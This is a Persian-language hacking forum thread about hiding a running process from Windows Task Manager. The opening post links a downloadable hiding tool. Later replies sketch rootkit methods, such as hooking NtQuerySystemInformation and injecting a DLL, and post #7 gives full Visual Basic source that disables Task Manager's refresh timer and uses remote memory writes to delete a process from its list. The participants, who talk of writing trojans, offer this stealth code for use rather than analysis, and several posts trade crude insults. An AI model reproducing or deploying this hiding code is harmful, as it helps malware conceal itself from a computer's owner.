اطلاعیه

Collapse
No announcement yet.

Hide Process مهم

Collapse
This topic is closed.
X
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • Hide Process مهم

    خوب دوستان براتون یه سورس کدی میزارم که

    با vc 2012 هست من خودم بعد از مدتها همچین سورس کدی دیدم برای سون 64 بیتی و 32 بیتی هست


    به صورت کامل از از تسکمنجر مخفی میشه برنامه خیلی کدش جالب و حرفه ای. بعد 10 ثانیه کاملا ناپدید میشه


    روش کارش : LIMIT MODE Process REMOTE
    http://uploadkon.ir/?file=hide_2.rar

  • #2
    با کد اینجکشن راحت میشه از لیست وییو هرچی بخوای حذف کنی
    راحته

    انجام پروژه های نرم افزاری در کمترین زمان و نازلترین قیمت
    برای تماس به آیدی Arashjeyjey در یاهو مسنجر پیام بدید.

    http://www.jeyjey.blogfa.com

    Comment


    • #3
      نوشته اصلی توسط Z4R4THUSTR4 نمایش پست ها
      با کد اینجکشن راحت میشه از لیست وییو هرچی بخوای حذف کنی
      راحته
      اقا به دلیل این که گونده گوزها در هرجای مشخص بشن من خواهش میکنم هرکسی که حرفی سخنی ادعایی در هر زمینه تو شبکه داره اثبات کنه

      و شما داداش من بیا رو وین سون 64 بیت با uac full این عمل که کده بالا می کنه بکن و سورسش بزار در غیر این صورت سر هر موضوع رشته نشو تشکر

      Comment


      • #4
        ----------
        Last edited by geek1982; 11-20-2013, 02:17 PM.

        Comment


        • #5
          -----------------------------
          Last edited by l4tr0d3ctism; 12-22-2013, 04:49 AM.
          ...

          Comment


          • #6
            نوشته اصلی توسط keylogger نمایش پست ها
            اقا به دلیل این که گونده گوزها در هرجای مشخص بشن من خواهش میکنم هرکسی که حرفی سخنی ادعایی در هر زمینه تو شبکه داره اثبات کنه

            و شما داداش من بیا رو وین سون 64 بیت با uac full این عمل که کده بالا می کنه بکن و سورسش بزار در غیر این صورت سر هر موضوع رشته نشو تشکر
            تو چرا انقدر بی تربیتی؟ درست صحبت کن به خاطر بچه های شبگرد نباشه مثل خودت باهات صحبت میکنم
            جدیدا هم هرجا میرینم میای رو انم اسکی میکنی

            به جای کل کل کردن بامن برو یه خرده سوادتو زیاد کن که بیخودی فتوا ندی
            اون روشی تسک منیجر 1000 تا راه برای مخفی کردن پروسه ها هست
            1-کد اینجکشن : تایمر تسک منیجر رو غیر فعال میکنی یه کد اینجکت میکنی که اون آیتم مورد نظر رو از لیست حذف کنه
            2-هوک: یه روت کیت مینویسی که تابع "NtQuerySystemInformation" رو هوک میکنی که میتونی میذاری تو DLL اینجکت میکنی به تسک منیجر (واسه x86) نخواستی اینجکت میزنی به همه پروسه ها که TaskList هم پیداش نمیکنه

            کلی روش واسه مخفی سازی هست چند تاشو برات توضیح بدم؟
            سورس هم میخوای برو توی وبلاگم روتکیت نوشتم چند تا سمپل هم هست میتونی دانلود کنی.

            واسه من uac uac راه انداخته

            پیوست: هیچ تروجان نویس حرفه ای نمیاد واسه مخفی سازی تو پروسه ها از این روش شما استفاده کنه
            روشی که گذاشتی واسه سال 2005 هست که بهزاد خزاما با سورس ویبی نوشت و پابلیکش کرد
            Last edited by JeyJey; 11-20-2013, 04:43 PM.

            انجام پروژه های نرم افزاری در کمترین زمان و نازلترین قیمت
            برای تماس به آیدی Arashjeyjey در یاهو مسنجر پیام بدید.

            http://www.jeyjey.blogfa.com

            Comment


            • #7
              تینم سورس ویژوال بیسیک واسه افراد آماتور که سال 2005 پابلیک شد.
              میتونید واسه حذف نام پروسه از تسک منیجر ازش استفاده کنید...

              کد:
              Attribute VB_Name = "Module1"
              Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
              Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
              Public Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
              Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
              Public Declare Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
              Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
              Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
              Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
              Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
              Public Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
              Public Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
              Public Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
              Public Declare Function RegisterServiceProcess Lib "kernel32.dll" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
              Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
              Public Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
              
              Public Type bkh
               flag As Long
               psz As Long
               lParam As Long
               pt As Long
               vkDirection As Long
              End Type
              کد:
              Private Sub Hide_Process(name As String)
              On Error Resume Next
              Dim pName As Long
              Dim pType As Long
              Dim l As Long
              Dim Tid As Long
              Dim hTid As Long
              Dim Pid As Long
              Dim h As Long
              Dim i As Long
              Dim hProcess As Long
              Dim f As bkh
              Dim s As String
              Dim bkh() As Byte
              h = FindWindow(vbNullString, "Windows Task Manager")
              KillTimer h, 0
              h = FindWindowEx(h, 0, "#32770", vbNullString)
              h = FindWindowEx(h, 0, "SysListView32", vbNullString)
              If h = 0 Then Exit Sub
              f.flag = 8 Or &H20
              Call GetWindowThreadProcessId(h, Pid)
              hProcess = OpenProcess(1082, 0, Pid)
              bkh = StrConv(name, vbFromUnicode)
              pName = VirtualAllocEx(hProcess, 0, Len(name) + 1, &H1000, 4)
              WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(name), l
              f.psz = pName
              pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
              WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
              i = SendMessage(h, &H1000 + 13, 0, pType)
              If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
              VirtualFreeEx hProcess, pType, Len(f), &H8000
              VirtualFreeEx hProcess, pName, LenB(name) + 1, &H8000
              CloseHandle hTid
              End Sub

              انجام پروژه های نرم افزاری در کمترین زمان و نازلترین قیمت
              برای تماس به آیدی Arashjeyjey در یاهو مسنجر پیام بدید.

              http://www.jeyjey.blogfa.com

              Comment


              • #8
                ببین نیار به بحث نیست من اسکی نمیریمو.. ولش کن ... زمان همه چیزو نشون میده باشه این کدیم که گذاشتی و کارا همه چیز مشخص هست و شما زیر پست من اومدی میگی فلان بیسار ولش کن :d

                Comment


                • #9
                  geek1982 هم مثل همیشه می خواست بگه سلف پروتکشن ربطی نداره به این کد من می دونم این داستانو زیاد داشتیم

                  Comment


                  • #10
                    ------------
                    Last edited by geek1982; 11-22-2013, 10:22 AM.

                    Comment


                    • #11
                      من از اول پستم هم گفتم بعد از مدتها همچین سورس کدی دیدم برای سون 64 بیتی و 32 بیتی هست دیدم خوب کش میری چیه اصلا من به اینا نیاز ندارم من نمیدونم کونه همه از چی می سوزه

                      باشه شما همتون قدیمی از زمان شاه این کا را رو می کنید اما هیچی نیستی فقط ادعا.....
                      Last edited by keylogger; 11-21-2013, 07:04 AM.

                      Comment


                      • #12
                        و اینم بگم geek1982 تو اگه فکر میکنی تو زمینهای که داری کار میکنی مطلب می زاری باور کن هنوز سطح دسترسی هارو نمیدونی حالا این یک دو اخر این پست یا دعوا میشه یا این که به تو و اون رفیقت رپطی نداره که من

                        چه پستی گذاشتم که بخوام برای شما توضیح بدم حله اسکل و ببین ادم چیزی که نیاز داره نمیزاره برای ههمه دانلود کنند تو شرلوک هولمز اسکل تپه هستی خخخخخخخخخخخخ

                        Comment


                        • #13

                          Comment


                          • #14
                            جوونننمممم

                            Comment


                            • #15
                              ربطی به 64 و 32 بيتی نداره کار با توابع API ويندوزه همونطور که آرش گفت اين سورس 8 ، 9 سال پيش با vb6 تو ايرانويج گذاشته بودن کارش هم اينطور بود تايمر تسک منيجر رو غير فال ميکرد و ليست پرسه مورد نظر رو از ليست ويو حذف ميکرد

                              ثانيا اگه معنی فروم رو نميدونی اينجا فرومه! محلی برای بحث و گفتگو وبلاگ که نيست که تعیین تکلیف ميکنی کی چطور نظری بده و دليلی وجود نداره کسی روشی رو بلده حتماً بايد با سورس به شما اثبات کنه! همين که يه تکنيکو به صورت تئوری توضيح بده برای بعضی ها خيلی ميتونه مفيد باشه

                              Comment

                              Working...
                              X